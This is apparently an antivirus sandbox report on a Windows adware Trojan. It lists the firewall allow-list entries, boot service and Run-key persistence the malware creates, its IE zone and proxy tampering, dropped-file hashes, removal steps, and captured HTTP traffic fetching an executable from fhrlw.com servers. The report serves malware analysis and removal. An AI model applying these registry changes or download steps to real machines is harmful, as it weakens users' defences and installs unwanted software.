"Seed" = "A4 04 CF D3 52 C8 23 F1 5E 97 A3 33 40 02 19 D1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process netsh.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AE 46 36 24 60 B5 26 DD 0F 6F BD B3 1B E2 A6"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"Wuji.exe" = "%Program Files%\Wuji\Wuji.exe:*:Enabled:WJ"
The process netsh.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 44 67 5F 5E 3E AE 95 10 EB DA BE 33 C1 CB 2B"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"update.exe" = "%Program Files%\Wuji\update.exe:*:Enabled:WJU"
The process SportLive.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\sougop]
"HDiskNum" = "00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\sougop]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\sougop]
"ErrorControl" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SportLive.exe"
[HKLM\System\CurrentControlSet\Services\sougop]
"StFlag" = "200"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\sougop]
"ImagePath" = "\??\%Program Files%\TogouInputin\Togoupplib.dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1400392493"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 73 BA 77 D6 3D E1 C8 87 D6 84 32 D0 33 6F 0A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\sougop]
"qid" = "165"
"InstFlag" = "1"
"DisplayName" = "Togoupplib"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\sougop]
"Start" = "2"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MsiExec.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 37 FA 3B 16 EA 71 14 EB 9A 16 E8 A9 6A C9 BF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F FB DB 99 98 F2 8C E4 0F 5A DC 54 52 63 F7 18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process oemfhsli.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\FhRl]
"Path" = "%Program Files%\fhrl"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\FhRl]
"Exit" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"FhCalendar.exe" = "TODO: "
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 16 2C 5F 74 64 B4 AC E0 3E CF 48 61 45 D7 F5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
4fd79c74d5e8ccc8b11a1d7bc1a0ef94 | c:\Documents and Settings\All Users\Documents\fhrl_6_12001.exe |
e1bc857849dcf7a928dbf96dd364060f | c:\Program Files\Common Files\Install\fhrlsli\oemfhsli.exe |
da61211302dbc86ced4738aff7c7868b | c:\Program Files\fhrl\DuiLib_u.dll |
911d9454d22938b77368a6da6c413313 | c:\Program Files\fhrl\FMDLL.dll |
1854bd1de533fd48ece92216fce57ea6 | c:\Program Files\fhrl\FMDLL32.dll |
ad962279c742cb5f2e32640d160e246c | c:\Program Files\fhrl\FMTest.exe |
97fea0e5059a5bde0cd59a3294ff3bde | c:\Program Files\fhrl\FhCalendar.exe |
a570c326ab7a433647c95b4a4669525b | c:\Program Files\fhrl\Fhuninstall.exe |
8d2cdf0a3c544db534735c8e83842cce | c:\Program Files\fhrl\KillProc.exe |
4e06c6f59cf9204c435cfa22a7abb669 | c:\Program Files\fhrl\Skin\Default\foembin.exe |
81a05de047701a946d8a441ffd08aa1a | c:\Program Files\fhrl\Update.exe |
7c9de379baab0801961a73377a379f14 | c:\Program Files\fhrl\uninst.exe |
349bf98a0025a50bf8e82158a62faeaa | c:\fhsli_6_12001.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 425984 | 201728 | 5.54424 | d0ef0aaee25bba1be37747cce181dfcf |
.rdata | 430080 | 69632 | 17920 | 5.50197 | 2c2e8d17d10be6f7aa7ca9f9876e0a99 |
.data | 499712 | 176128 | 17920 | 5.51743 | 4b67851f67928e82417856798afacf3a |
.rsrc | 675840 | 790528 | 246272 | 5.53726 | 981a356a8a9ce2514af7897a72a377f8 |
.aspack | 1466368 | 12288 | 9728 | 3.47169 | 263888398d77ec23c33d8b15fd5d106b |
.adata | 1478656 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /js/jquery-1.3.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 57272
Content-Type: application/x-javascript
Last-Modified: Fri, 06 Sep 2013 02:48:44 GMT
Accept-Ranges: bytes
ETag: "5bc4399aabaace1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=614400-819200
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 614400-819200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:15 GMT
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1228800-1433600
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1228800-1433600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
<<< skipped >>>
GET /app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif HTTP/1.1
Accept: */*
